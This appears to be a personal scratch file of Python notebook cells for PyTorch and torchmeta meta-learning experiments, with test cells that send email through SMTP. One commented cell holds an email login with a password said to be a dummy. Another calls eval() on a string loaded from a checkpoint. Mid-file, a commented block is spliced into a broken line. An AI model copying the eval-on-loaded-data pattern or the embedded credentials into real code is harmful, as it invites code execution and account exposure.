# meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
# epochs = 2
#
# print(f'batch_size = {batch_size}')
# print(f'len(metaset) = {len(metaset)}')
# print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
# with tqdm(range(epochs)) as tepochs:
# for epoch in tepochs:
# print(f'\n[epoch={epoch}]')
# for batch_idx, batch in enumerate(meta_dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# print()
#
# # %%
#
# import torch
#
# x = torch.tensor([1., 2, 3])
# print(x.mean())
#
# print(x * x)
# print(x @ x)
# print(x.matmul(x))
#
# # x.mm(x) weird error
#
# # %%
#
# import torch
#
# x = torch.randn(12, 20)
# y = torch.randn(20, 30)
#
# out = x @ y
# print(out.size())
#
# # %%
# # https://www.youtube.com/watch?v=46RjXawJQgg&t=1493s
#
# from pathlib import Path
#
# from pandas import read_csv
#
# read_csv(Path())
#
# # %%
#
# print('hello-world')
# xx = 2
#
# print(xx)
#
# print(' ')
#
# ##
# print('end!')
#
# # %%
#
# # let's see how big the random values from the normal are
#
# import torch
#
# D = 8
# w = torch.tensor([0.1] * D)
# print(f'w.size() = {w.size()}')
# mu = torch.zeros(w.size())
# std = w * 1.5e-2 # two decimal places and a little more
# noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
#
# print('--- noise ')
# print(noise.size())
# print(noise)
#
# w += noise
# print('--- w')
# print(w.size())
# print(w)
#
# # %%
#
# # editing parameters in pytorch in place without error: https://discuss.pytorch.org/t/how-are-layer-weights-and-biases-initialized-by-default/13073/41
#
# import torch
# import torch.nn as nn
# from collections import OrderedDict
#
# Din, Dout = 8, 1
#
# base_model = nn.Sequential(OrderedDict([
# ('f1', nn.Linear(Din, Dout)),
# ('out', nn.SELU())
# ]))
#
# with torch.no_grad():
# for i, w in enumerate(base_model.parameters()):
# print(f'--- i = {i}')
# print(w)
# w += w + 0.001
# print(w)
#
# # %%
#
# # pickle vs torch.save
#
# # def log_validation(args, meta_learner, outer_opt, meta_val_set):
# # """ Log the validation loss, acc. Checkpoint the model if that flag is on. """
# # if args.save_ckpt: # pickle vs torch.save https://discuss.pytorch.org/t/advantages-disadvantages-of-using-pickle-module-to-save-models-vs-torch-save/79016
# # # make dir to logs (and ckpts) if not present. Throw no exceptions if it already exists
# # path_to_ckpt = args.logger.current_logs_path
# # path_to_ckpt.mkdir(parents=True, exist_ok=True) # creates parents if not presents. If it already exists that's ok do nothing and don't throw exceptions.
# # ckpt_path_plus_path = path_to_ckpt / Path('db')
# #
# # args.base_model = "check the meta_learner field in the checkpoint not in the args field" # so that we don't save the child model so many times since it's part of the meta-learner
# # # note this obj has the last episode/outer_i we ran
# # torch.save({'args': args, 'meta_learner': meta_learner}, ckpt_path_plus_path)
# # acc_mean, acc_std, loss_mean, loss_std = meta_eval(args, meta_learner, meta_val_set)
# # if acc_mean > args.best_acc:
# # args.best_acc, args.loss_of_best = acc_mean, loss_mean
# # args.logger.loginfo(
# # f"***> Stats of Best Acc model: meta-val loss: {args.loss_of_best} +- {loss_std}, meta-val acc: {args.best_acc} +- {acc_std}")
# # return acc_mean, acc_std, loss_mean, loss_std
#
# # %%
#
# import numpy as np
# from sklearn.linear_model import LinearRegression
#
# X = np.array([[1, 1], [1, 2], [2, 2], [2, 3]])
# # y = 1 * x_0 + 2 * x_1 + 3
# y = np.dot(X, np.array([1, 2])) + 3
# reg = LinearRegression()
# print(reg)
# reg = LinearRegression().fit(X, y)
# print(reg)
# reg.score(X, y)
#
# reg.coef_
#
# reg.intercept_
#
# reg.predict(np.array([[3, 5]]))
#
# # %%
#
# # https://stackoverflow.com/questions/63818676/what-is-the-machine-precision-in-pytorch-and-when-should-one-use-doubles
# # https://discuss.pytorch.org/t/how-does-one-start-using-double-without-unexpected-bugs/95715
# # https://discuss.pytorch.org/t/what-is-the-machine-precision-of-pytorch-with-cpus-or-gpus/9384
#
# import torch
#
# x1 = torch.tensor(1e-6)
# x2 = torch.tensor(1e-7)
# x3 = torch.tensor(1e-8)
# x4 = torch.tensor(1e-9)
#
# eps = torch.tensor(1e-11)
#
# print(x1.dtype)
# print(x1)
# print(x1 + eps)
#
# print(x2)
# print(x2 + eps)
#
# print(x3)
# print(x3 + eps)
#
# print(x4)
# print(x4 + eps)
#
# # %%
#
# # python float is a C double
# # NumPy's standard numpy.float is the same (so C double), also numpy.float64.
# # https://www.doc.ic.ac.uk/~eedwards/compsys/float/
# # https://stackoverflow.com/questions/1049722/what-is-2s-complement
# # https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
# # https://stackoverflow.com/questions/7524838/fixed-point-vs-floating-point-number
# # https://en.wikipedia.org/wiki/Single-precision_floating-point_format
# # https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
#
# import torch
#
# xf = torch.tensor(1e-7)
# xd = torch.tensor(1e-7, dtype=torch.double)
# epsf = torch.tensor(1e-11)
#
# print(xf.dtype)
# print(xf)
# print(xf.item())
# print(type(xf.item()))
#
# #
# print('\n> test when a+eps = a')
# print(xf.dtype)
# print(f'xf = {xf}')
# print(f'xf + 1e-7 = {xf + 1e-7}')
# print(f'xf + 1e-11 = {xf + 1e-11}')
# print(f'xf + 1e-8 = {xf + 1e-8}')
# print(f'xf + 1e-16 = {xf + 1e-16}')
# # after seeing the above it seems that there are errors if things are small
#
# print('\n> test when a+eps = a')
# x = torch.tensor(1e-7, dtype=torch.double)
# print(f'xf = {x}')
# print(f'xf + 1e-7 = {x + 1e-7}')
# print(f'xf + 1e-11 = {x + 1e-11}')
# print(f'xf + 1e-8 = {x + 1e-8}')
# print(f'xf + 1e-16 = {x + 1e-16}')
# # using doubles clearly is better but still has some errors
#
# print('\n> test when a+eps = a')
# x = torch.tensor(1e-4)
# print(f'xf = {x}')
# print(f'xf + 1e-7 = {x + 1e-7}')
# print(f'xf + 1e-11 = {x + 1e-11}')
# print(f'xf + 1e-8 = {x + 1e-8}')
# print(f'xf + 1e-16 = {x + 1e-16}')
#
# # %%
#
# # https://pytorch.org/docs/stable/torchvision/models.html
#
# # %%
#
# import torch
#
# print(torch.zeros(2))
# m = torch.distributions.MultivariateNormal(torch.zeros(2), torch.eye(2))
# x = m.sample()
# print(x)
#
# # m = torch.distributions.MultivariateNormal(torch.zeros(1, 3), torch.eye(1, 3))
# # mu = m.sample()
# # print(mu)
#
# m = torch.distributions.MultivariateNormal(torch.zeros(1, 5), torch.eye(5))
# y = m.sample()
# print(y)
#
# # %%
#
# from pathlib import Path
# from matplotlib import my_pyplot as plt
#
# import numpy as np
#
# path = Path('~/data/').expanduser()
#
# # x = np.linspace(0, 2*np.pi, 50)
# x = np.random.uniform(0, 2 * np.pi, 100)
# noise = np.random.normal(0.0, 0.05, 100)
# print(noise)
# y = np.sin(x) + noise
# plt.figure()
# plt.scatter(x, y)
# plt.ylabel('f(x)')
# plt.ylabel('x (raw feature)')
# plt.savefig(path / 'test_fig.pdf')
# plt.savefig(path / 'test_fig.png')
# plt.show()
#
# # %%
#
# from socket import gethostname
# from email.message import EmailMessage
# import smtplib
#
# server = smtplib.SMTP('smtp.gmail.com', 587)
# server.starttls()
# print(server)
#
# # %%
#
# # MTA (Mail Transfer Agent)
# # https://stackoverflow.com/questions/784201/is-there-a-python-mta-mail-transfer-agent
# # https://www.quora.com/How-does-one-send-e-mails-from-Python-using-MTA-Mail-Transfer-Agent-rather-than-an-SMTP-library
# # https://www.reddit.com/r/learnpython/comments/ixlq81/how_does_one_send_emails_from_python_using_mta/
#
# # Q why can't I just send an email directly?
# # Q why do smtp libraries exist
#
# # %%
#
# import smtplib
#
# server = smtplib.SMTP('smtp.intel-research.net', 25)
# server.starttls()
# print(server)
#
#
# # %%
#
# # from socket import gethostname
# # from email.message import EmailMessage
# # import smtplib
# #
# # server = smtplib.SMTP('smtp.gmail.com', 587)
# # server.starttls()
# # # not a real email account nor password, its all ok!
# # server.login('slurm.miranda@gmail.com', 'dummy123!@#$321')
# #
# # # craft message
# # msg = EmailMessage()
# #
# # message = f'{message}\nSend from Hostname: {gethostname()}'
# # msg.set_content(message)
# # msg['Subject'] = subject
# # msg['From'] = 'slurm.miranda@gmail.com'
# # msg['To'] = destination
# # # send msg
# # server.send_message(msg)
#
# # %%
#
# # send email with smtp intel
#
# def send_email(message):
# from socket import gethostname
# import smtplib
# hostname = gethostname()
# from_address = 'slurm.miranda@gmail.com'
# from_address = 'miranda9@intel-research.net.'
# # to_address = [ 'iam-alert@intel-research.net']
# to_address = ['brando.science@gmail.com']
# subject = f"Test msg from: {hostname}"
# ##
# message = f'Test msg from {hostname}: {message}'
# full_message = f'From: {from_address}\n' \
# f'To: {to_address}\n' \
# f'Subject: {subject}\n' \
# f'{message}'
# server = smtplib.SMTP('smtp.intel-research.net')
# server.sendmail(from_address, to_address, full_message)
# server.quit()
# # sys.exit(1)
#
#
# print('start')
# send_email('HelloWorld')
# print('done email test!')
#
#
# # %%
#
# def send_email2(message):
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# from socket import gethostname
# import smtplib
# server = smtplib.SMTP('smtp.intel-research.net')
# # craft message
# msg = MIMEMultipart()
#
# message = f'{message}\nSend from Hostname: {gethostname()}'
# msg['Subject'] = 'Test email'
# msg['From'] = 'miranda9@intel-research.net.'
# msg['To'] = 'brando.science@gmail.com'
# msg.attach(MIMEText(message, "plain"))
# # send message
# server.send_message(msg)
# # server.sendmail(from_address, to_address, full_message)
# server.quit()
#
#
# print('start')
# send_email2('HelloWorld')
# print('done email test!')
#
# #%%
#
# from pathlib import Path
#
# message = 'HelloWorld'
# path_to_pdf = Path('~/data/test_fig.pdf').expanduser()
#
# from email.mime.application import MIMEApplication
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# from socket import gethostname
# import smtplib
#
# server = smtplib.SMTP('smtp.intel-research.net')
# # craft message
# msg = MIMEMultipart()
#
# message = f'{message}\nSend from Hostname: {gethostname()}'
# msg['Subject'] = 'Test email'
# msg['From'] = 'miranda9@intel-research.net.'
# msg['To'] = 'brando.science@gmail.com'
# msg.attach(MIMEText(message, "plain"))
# # attach pdf
# if path_to_pdf.exists():
# with open(path_to_pdf, "rb") as f:
# # attach = email.mime.application.MIMEApplication(f.read(),_subtype="pdf")
# attach = MIMEApplication(f.read(), _subtype="pdf")
# attach.add_header('Content-Disposition', 'attachment', filename=str(path_to_pdf))
# msg.attach(attach)
#
# # send message
# server.send_message(msg)
# # server.sendmail(from_address, to_address, full_message)
# server.quit()
#
# #%%
#
# # Here, we used "w" letter in our argument, which indicates write and will create a file if it does not exist in library
# # Plus sign indicates both read and write.
#
# # with open('data.json', 'w+') as f:
# # json.dump(self.stats, f)
#
# #%%
#
# import numpy as np
# from torch.utils.tensorboard import SummaryWriter # https://deeplizard.com/learn/video/psexxmdrufm
#
# path = Path('~/data/logs/').expanduser()
# tb = SummaryWriter(log_dir=path)
# # tb = SummaryWriter(log_dir=args.current_logs_path)
#
# for i in range(3):
# loss = i + np.random.normal(loc=0, scale=1)
# tb.add_scalar('loss', loss, i)
#
# # %%
#
# # https://pytorch.org/tutorials/beginner/saving_loading_models.html
#
# # Saving & Loading Model for Inference
# # Save/Load state_dict (Recommended)
# # Save:
# # torch.save(model.state_dict(), PATH)
# #
# # # Load:
# # model = TheModelClass(*args, **kwargs)
# # model.load_state_dict(torch.load(PATH))
# # model.eval()
#
# # %%
#
# # Save:
# # torch.save({
# # 'epoch': epoch,
# # 'model_state_dict': model.state_dict(),
# # 'optimizer_state_dict': optimizer.state_dict(),
# # 'loss': loss,
# # ...
# # }, PATH)
# # # Load:
# # model = TheModelClass(*args, **kwargs)
# # optimizer = TheOptimizerClass(*args, **kwargs)
# #
# # checkpoint = torch.load(PATH)
# # model.load_state_dict(checkpoint['model_state_dict'])
# # optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# # epoch = checkpoint['epoch']
# # loss = checkpoint['loss']
# #
# # model.eval()
# # # - or -
# # model.train()
#
# # %%
#
# # https://discuss.pytorch.org/t/how-does-load-a-sequential-model-from-a-string/97648
# # https://stackoverflow.com/questions/64109883/how-does-one-load-a-sequential-model-from-a-string-in-pytorch
#
# # %%
#
# torch.save({'f': f,
# 'f_state_dict': f.state_dict(),
# 'f_str': str(f),
# 'f_modules': f._modules,
# 'f_modules_str': str(f._modules)
# }, path2avg_f)
#
# #%%
#
# from pathlib import Path
# from torch.utils.tensorboard import SummaryWriter
# import numpy as np
#
# path = Path('~/data/tb_test/').expanduser()
# # path = Path('~/logs/logs_Sep29_12-38-08_jobid_-1/tb').expanduser()
# writer = SummaryWriter(path)
#
# for n_iter in range(100):
# writer.add_scalar('Loss/train', np.random.random(), n_iter)
# writer.add_scalar('Loss/test', np.random.random(), n_iter)
# writer.add_scalar('Accuracy/train', np.random.random(), n_iter)
# writer.add_scalar('Accuracy/test', np.random.random(), n_iter)
#
# print('done! \a')
#
# #%%
#
# db = torch.load(str(args.resume_ckpt_path))
# # args.epchs = db['epoch'] # we can start counting from zero
# # args.epoch += 1 # this is needed so that it starts on the next batch since it says the last batch it *did* and range counts with 0 indexing.
# # meta_learner = db['meta_learner']
# args.base_model = db['f']
# # in case loading directly doesn't work
# modules = eval(db['f_modules_str'])
# args.base_model = torch.nn.Sequential(modules)
# f_state_dict = db['f_state_dict']
# args.base_model.load_state_dict(f_state_dict)
#
#
# #%%
#
# # Torch-meta miniImagenet
#
# import torchmeta
# from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
#
# from pathlib import Path
#
# from tqdm import tqdm
#
# data_path = Path('~/data/').expanduser()
# meta_split = 'train'
# dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
# # dataset = torchmeta.datasets.Omniglot(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
#
# print(f'type(metaset_miniimagenet) = {type(dataset)}')
# print(f'len(metaset_miniimagenet) = {len(dataset)}')
# shots, test_shots = 5, 15
# metaset = ClassSplitter(
# dataset,
# num_train_per_class=shots,
# num_test_per_class=test_shots,
# shuffle=True)
# batch_size = 16
# num_workers = 0
# meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
# epochs = 2
#
# print(f'batch_size = {batch_size}')
# print(f'len(metaset) = {len(metaset)}')
# print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
# with tqdm(range(epochs)) as tepochs:
# for epoch in tepochs:
# print(f'\n[epoch={epoch}]')
# for batch_idx, batch in enumerate(meta_dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# print()
# break
# break
#
# #%%
#
# from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
# dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
#
# for batch in dataloader:
# train_inputs, train_targets = batch["train"]
# print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
# print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
#
# test_inputs, test_targets = batch["test"]
# print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
# print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
#
# #%%
#
# # replacing a module in in a pytorch model
# # https://discuss.pytorch.org/t/how-to-modify-a-pretrained-model/60509/11
#
# import torch
#
# from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# import copy
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
# dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
#
#
#
# def replace_bn(module, name):
# """
# Recursively put desired batch norm in nn.module module.
#
# set module = net to start code.
# """
# # go through all attributes of module nn.module (e.g. network or layer) and put batch norms if present
# for attr_str in dir(module):
# target_attr = getattr(module, attr_str)
# if type(target_attr) == torch.nn.BatchNorm2d:
# new_bn = torch.nn.BatchNorm2d(target_attr.num_features, target_attr.eps, target_attr.momentum, target_attr.affine,
# track_running_stats=False)
# setattr(module, attr_str, new_bn)
#
# # iterate through immediate child modules. Note, the recursion is done by our code no need to use named_modules()
# for name, immediate_child_module in module.named_children():
# replace_bn(immediate_child_module, name)
#
# def convert_bn(model):
# for module in model.modules():
# if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
# module.__init__(module.num_features, module.eps,
# module.momentum, module.affine,
# track_running_stats=False)
#
# fc_out_features = 5
#
# # model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
# # replace_bn(model, 'model')
# # model.fc = torch.nn.Linear(in_features=512, out_features=fc_out_features, bias=True)
# #
# # model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet50', pretrained=False)
# # replace_bn(model, 'model')
# # model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
#
# # model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet101', pretrained=False)
# # replace_bn(model, 'model')
# # model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
#
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet152', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
#
# for batch in dataloader:
# train_inputs, train_targets = batch["train"]
# print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
# print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
# test_inputs, test_targets = batch["test"]
# print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
# print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# first_meta_batch = train_inputs[0] # task
# nk_task = first_meta_batch
# out = model(nk_task)
# print(f'resnet out.size(): {out.size()}')
# break
#
# print('success\a')
#
# # %%
#
# import torch
#
# import torchvision.transforms as transforms
#
# # import torchmeta
# # from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
#
# normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# data_augmentation_transforms = transforms.Compose([
# transforms.RandomResizedCrop(84),
# transforms.RandomHorizontalFlip(),
# transforms.ColorJitter(
# brightness=0.4,
# contrast=0.4,
# saturation=0.4,
# hue=0.2),
# transforms.ToTensor(),
# normalize])
# dataset = miniimagenet(data_path,
# transform=data_augmentation_transforms,
# ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
#
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
#
# print(len(dataloader))
# # for batch_idx, batch in enumerate(dataloader):
# # print(f'--> batch_idx = {batch_idx}')
# # train_inputs, train_targets = batch["train"]
# # print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
# # print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
# # test_inputs, test_targets = batch["test"]
# # print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
# # print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# # first_meta_batch = train_inputs[0] # task
# # nk_task = first_meta_batch
# # out = model(nk_task)
# # print(f'resnet out.size(): {out.size()}')
# # break
#
# print('success\a')
#
# #%%
#
# import torch
#
# import torchvision.transforms as transforms
#
# # import torchmeta
# # from torchmeta.datasets.helpers import omniglot
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from pathlib import Path
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
#
# normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# data_augmentation_transforms = transforms.Compose([
# transforms.RandomResizedCrop(84),
# transforms.RandomHorizontalFlip(),
# transforms.ColorJitter(
# brightness=0.4,
# contrast=0.4,
# saturation=0.4,
# hue=0.2),
# transforms.ToTensor(),
# normalize])
# dataset = miniimagenet(data_path,
# transform=data_augmentation_transforms,
# ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len augmented = {len(dataloader)}')
#
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len normal = {len(dataloader)}')
#
# print('success\a')
#
# #%%
#
# import torch
#
# import torchvision.transforms as transforms
#
# from torchmeta.datasets.helpers import miniimagenet
# from torchmeta.utils.data import BatchMetaDataLoader
#
# from tqdm import tqdm
#
# from pathlib import Path
#
# meta_split = 'train'
# data_path = Path('~/data/').expanduser()
#
# # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# # data_augmentation_transforms = transforms.Compose([
# # transforms.RandomResizedCrop(84),
# # transforms.RandomHorizontalFlip(),
# # transforms.ColorJitter(
# # brightness=0.4,
# # contrast=0.4,
# # saturation=0.4,
# # hue=0.2),
# # transforms.ToTensor(),
# # normalize])
# # dataset = miniimagenet(data_path,
# # transform=data_augmentation_transforms,
# # ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# # dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# # print(f'len augmented = {len(dataloader)}')
#
# dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len normal = {len(dataloader)}')
#
# num_batches = 10
# with tqdm(dataloader, total=num_batches) as pbar:
# for batch_idx, batch in enumerate(pbar):
# train_inputs, train_targets = batch["train"]
# print(train_inputs.size())
# # print(batch_idx)
# if batch_idx >= num_batches:
# break
#
# print('success\a')
#
# #%%
#
# from math import comb
#
# total_classes = 64
# n = 5
# number_tasks = comb(total_classes, n)
# print(number_tasks)
#
# #%%
#
# # saving a json file save json file
# # human readable pretty print https://stackoverflow.com/questions/12943819/how-to-prettyprint-a-json-file
#
# import json
#
# data = 'data string'
# with open('data.txt', 'w') as outfile:
# json.dump(data, outfile)
#
# # json.dump(data, open('data.txt', 'w'))
#
# # with open(current_logs_path / 'experiment_stats.json', 'w+') as f:
# # json.dump(self.stats, f)
# # data_ars = {key:value for (key,value) in dictonary.items()}
# # x = {key:str(value) for (key,value) in args.__dict__.items()}
#
# with open(args.current_logs_path / 'args.json', 'w+') as argsfile:
# args_data = {key: str(value) for (key, value) in args.__dict__.items()}
# json.dump(args_data, argsfile, indent=4)
#
# #%%
#
# # get gpu model as string: https://stackoverflow.com/questions/64526139/how-does-one-get-the-model-of-the-gpu-in-python-and-save-it-as-a-string
#
# #%%
#
#
# image = PILI.open(self.images[idx]).convert('RGB')r (key,value) in args.__dict__.items()}
with open(args.current_logs_path / 'args.json', 'w+') as argsfile:
args_data = {key: str(value) for (key, value) in args.__dict__.items()}
json.dump(args_data, argsfile, indent=4)
# %%
# get gpu model as string: https://stackoverflow.com/questions/64526139/how-does-one-get-the-model-of-the-gpu-in-python-and-save-it-as-a-string
# %%
mean = [120.39586422 / 255.0, 115.59361427 / 255.0, 104.54012653 / 255.0]
# [0.47214064400000005, 0.45330829125490196, 0.4099612805098039]
std = [70.68188272 / 255.0, 68.27635443 / 255.0, 72.54505529 / 255.0]
mean2 = [0.485, 0.456, 0.406]
std2 = [0.229, 0.224, 0.225]
print(mean)
print(mean2)
print(mean == mean2)
print(std)
print(std2)
print(std == std2)
# %%
# references:
# https://stackoverflow.com/questions/20486700/why-we-always-divide-rgb-values-by-255
import numpy as np
from PIL import Image
import glob
import torchvision.transforms as transforms
from pathlib import Path
import os
transform = transforms.Compose([transforms.ToTensor()])
# get image meta-lstm
split = 'val'
root = Path(f'~/data/miniimagenet_meta_lstm/miniImagenet/{split}').expanduser()
labels = sorted(os.listdir(root))
images = [glob.glob(os.path.join(root, label, '*')) for label in labels]
label_idx = 0
img_idx = 0
img = Image.open(images[img_idx][img_idx]) # .convert('RGB')
# check image as 0-255
a = np.asarray(img) # 0-255 image range
print(a)
img = Image.fromarray(a) # from array to img object
print(img)
a2 = np.asarray(a)
print((a == a2).all())
# converts image object or 0-255 image to
img = transform(img)
print(img)
# rfs
# img = np.asarray(self.imgs[item]).astype('uint8')
# meta-lstm
# images = [glob.glob(os.path.join(root, label, '*')) for label in self.labels]
# image = PILI.open(self.images[idx]).convert('RGB')
# %%
from tqdm import tqdm
train_iters = 2
with tqdm(range(train_iters), total=train_iters) as pbar_epochs:
print(range(train_iters))
print(list(range(train_iters)))
for epoch in pbar_epochs:
print(epoch)
# %%
## sinusioid function
print('Starting Sinusioid cell')
import torchmeta
# from torchmeta.toy import Sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
# from torchmeta.transforms import ClassSplitter
# from tqdm import tqdm
batch_size = 16
shots = 5
test_shots = 15
dataset = torchmeta.toy.helpers.sinusoid(shots=shots, test_shots=test_shots)
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size, num_workers=4)
# print(f'batch_size = {batch_size}')
# print(f'len(dataloader) = {len(dataloader)}\n')
# for batch_idx, batch in enumerate(dataloader):
# print(f'batch_idx = {batch_idx}')
# train_inputs, train_targets = batch['train']
# test_inputs, test_targets = batch['test']
# print(f'train_inputs.shape = {train_inputs.shape}')
# print(f'train_targets.shape = {train_targets.shape}')
# print(f'test_inputs.shape = {test_inputs.shape}')
# print(f'test_targets.shape = {test_targets.shape}')
# if batch_idx >= 1: # halt after 2 iterations
# break
# two tasks are different
dl = enumerate(dataloader)
_, x1 = next(dl)
x1, _ = x1['train']
print(f'x1 = {x1.sum()}')
_, x2 = next(dl)
x2, _ = x2['train']
print(f'x2 = {x2.sum()}')
assert (x1.sum() != x2.sum())
print('assert pass, tasks have different data')
# same task twice
dl = enumerate(dataloader)
_, x1 = next(dl)
x1, _ = x1['train']
print(f'x1 = {x1.sum()}')
dl = enumerate(dataloader)
_, x2 = next(dl)
x2, _ = x2['train']
print(f'x2 = {x2.sum()}')
assert (x1.sum() == x2.sum())
print('DONE\a')
# %%
# https://github.com/tristandeleu/pytorch-meta/issues/69
from torchmeta.toy.helpers import sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
batch_size = 16
shots = 5
test_shots = 15
# Seed the dataset with `seed = 0`
dataset = sinusoid(shots=shots, test_shots=test_shots, seed=0)
# `num_workers = 0` to avoid stochasticity of multiple processes
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=0)
batch = next(iter(dataloader))
inputs, _ = batch['train']
print(f'Sum of inputs: {inputs.sum()}')
# %%
# https://github.com/tristandeleu/pytorch-meta/issues/69
from torchmeta.toy.helpers import sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
def random_hash():
return random.randrange(1 << 32)
batch_size = 16
shots = 5
test_shots = 15
# Seed the dataset with `seed = 0`
dataset = sinusoid(shots=shots, test_shots=test_shots, seed=0)
dataset.__hash__ = random_hash
# `num_workers = 0` to avoid stochasticity of multiple processes
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=0)
batch = next(iter(dataloader))
inputs, _ = batch['train']
print(f'Sum of inputs: {inputs.sum()}')
# %%
# https://github.com/tristandeleu/pytorch-meta/issues/69
from torchmeta.toy.helpers import sinusoid
from torchmeta.utils.data import BatchMetaDataLoader
batch_size = 16
shots = 5
test_shots = 15
dataset = sinusoid(shots=shots, test_shots=test_shots)
# `num_workers = 0` to avoid stochasticity of multiple processes
dataloader = BatchMetaDataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=4)
batch = next(iter(dataloader))
inputs, _ = batch['train']
print(f'Sum of inputs: {inputs.sum()}')
# %%
from pathlib import Path
import torch
path = '/home/miranda9/data/dataset_LS_fully_connected_NN_with_BN/meta_set_fully_connected_NN_with_BN_std1_8.0_std2_1.0_noise_std0.1/train/fi_fully_connected_NN_with_BN_norm_f_151.97657775878906'
path = Path(path).expanduser() / 'fi_db.pt'
path = str(path)
# db = torch.load(path)
# torch.jit.load(path)
db = torch.jit.load(str(path))
print(db)
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
fc0 = nn.Linear(in_features=1, out_features=1)
params = [('fc0', fc0)]
mdl = nn.Sequential(OrderedDict(params))
x = torch.tensor([1.0])
y = mdl(x)
print(y)
# %%
# secs per it to days
def sect_per_it_2_days(secs_per_it, total_its):
